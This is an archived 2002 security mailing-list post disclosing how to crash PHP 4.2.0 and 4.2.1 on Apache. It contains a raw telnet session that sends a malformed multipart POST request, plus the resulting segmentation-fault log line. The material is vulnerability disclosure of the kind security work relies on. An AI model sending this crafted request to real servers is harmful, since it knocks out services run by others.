lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <3D3EB9A1.8080100@rapid7.com>
From: jtesta at rapid7.com (Joseph S. Testa II)
Subject: How to reproduce PHP segfault.



Happy Wednesday.

     The following is an example on how to reproduce the segmentation violation
in PHP 4.2.0 & PHP 4.2.1 with Apache 1.3.26 on Linux x86:


[jdog@...derland logs]$ telnet 192.168.x.x 80
Trying 192.168.x.x...
Connected to 192.168.x.x.
Escape character is '^]'.
POST /chad_owns_me.php HTTP/1.0
Content-type: multipart/form-data; boundary=---------------------------123
Content-length: 129

-----------------------------123
Content-Disposition: filename

http://www.rapid7.com/
-----------------------------123--

Connection closed by foreign host.
[jdog@...derland logs]$ cat error_log
[Tue Jul 23 11:11:52 2002] [notice] child pid 8948 exit signal Segmentation 
fault (11)
[jdog@...derland logs]$


     Note that a path to an existing PHP file must be used, otherwise the PHP
interpreter will not be invoked.


     - Joe


GPG key:  http://www.cs.rit.edu/~jst3290/joetesta_r7.pub
A22B 2683 C40E 5443 AE52  AD6D 65B2 F5DF 4B11 06B4

-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: php.asc
Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020724/2325561e/php.ksh

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ